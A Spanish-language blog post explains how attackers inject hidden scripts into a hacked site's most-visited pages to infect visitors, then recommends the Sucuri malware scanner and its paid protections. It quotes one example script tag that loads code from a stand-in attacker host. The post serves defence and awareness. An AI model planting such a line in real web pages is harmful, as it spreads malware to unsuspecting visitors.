Búsqueda de malware en sitios Web.

Observar páginas “hackeadas” o con defacement* será cada vez menos común, el motivo de ello es que a los delincuentes cibernéticos les resulta mas productivo permanecer ocultos e indetectables cada que vulneran un sitio Web.

Revisemos el siguiente escenario: 

Mediante el aprovechamiento de una vulnerabilidad, un atacante consigue tener acceso al panel de control y al sistema operativo del sitio http://www.example.com, uno de los portales Web con mas demanda en la industria de los vídeo juegos. Este atacante decide no modificar la página de inicio, sino en lugar de ello, hace uso del propio gestor para identificar las 10 páginas mas visitadas.

Contando con la información anterior, el atacante agrega código malicioso en dichas páginas con la intención de propagar malware a sus visitantes. Un fragmento del código agregado podría ser:

<script type=’text/javascript’ src=’http://malware-site.com/js/xGf0s.js’></script&gt;

Esta línea de código tiene como misión llamar a un script malicioso que esta hospedado en otro sitio Web (posiblemente también vulnerado) y con ello hacer que el usuario que navega en http://www.example.com sea infectado de manera inadvertida.

Dado que http://www.example.com es un portal con gran cantidad de visitantes, será un medio ideal para que el atacante infecte  bastantes equipos a costa de haber vulnerado tan solo uno.

El objetivo de infectar a los usuarios finales puede ser uno o varios de los siguientes:

  • Instalar software que capture datos bancarios o sensibles.
  • Instalar software para el envío masivo de correo electrónico.
  • Instalar software para extraer archivos confidenciales.
  • Instalar software que convierta al equipo infectado en elemento mas de una Botnet.

Lo anterior son ejemplos de las acciones que realizan los atacantes y el motivo de no realizar el defacement.

Generalmente cuando se identifica que un sitio Web distribuye malware o que esta vinculado con sitios maliciosos, ha pasado ya el tiempo suficiente para infectar un número elevado de equipos y marcado como un sitio malicioso que propaga malware; con estos resultados se impacta no solo la reputación del sitio, sino también la accesibilidad al portal.

Con base a lo anterior, surge la siguiente cuestión: ¿que herramienta nos puede ayudar a identificar proactivamente si nuestro sitio Web distribuye malware o si esta vinculado con sitios maliciosos?

Existen varias alternativas para responder, y si bien la mayoría tiene un costo asociado para mantenerse recurrentes, también existen alternativas gratuitas que funciona bajo demanda. Sin mas preámbulo, a continuación se muestra una herramientas que nos ayudará a identificar si nuestro sitio Web contiene malware.

Sucuri Website Malware and Security Scanner (http://sitecheck.sucuri.net).

Sucuri en su versión gratuita (ejecutada bajo demanda) ayudará a identificar si el sitio Web contiene malware, si se encuentra marcado como malicioso y si el servidor Web o la plataforma de publicación esta desactualizada. 

Suruti.NET

 

También cuenta con una versión de paga la cual realiza lo anterior de manera automática y recurrente, así mismo, agrega los siguientes servicios.

En caso de que el sitio Web haya sido alterado ya sea por un daface o por la inserción de código malicioso, Sucuri en automático remplazará el sitio afectado por una copia de respaldo previamente definida. Esto lo realiza por medio de una conexión configurada ya sea por SCP o por FTP.

Cuenta con el servicio de Web Application Firewall (WAF) para proteger el sitio Web de ataques tipo Cross Site Request Forgery (CSRF), Cross Site Scripting (XSS), Remote File Inclusions (RFI) y SQL Injection (SQLi) entre otros.

Al contratar el servicio de WAF, en automático se integra el servicio de CDN con el cual agilizará la carga del portal Web reduciendo hasta en un 50% el tiempo requerido para mostrarse en el navegador, lo anterior ya que se propagará por medio de múltiples centros de datos en Internet.

Cuenta con un módulo que realiza respaldos automatizados con el objetivo de estar preparado en caso de una contingencia.

Por último, monitorea la información registrada ante NIC, así como los registros DNS con el objetivo de reportar cualquier modificación a estos.

Sin lugar a dudas, existen muchas alternativas que nos ayudarán a proteger nuestro sitio Web, aquí solo se ha observado una opción, sin en cambio, en el futuro se estarán agregando mas alternativas.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s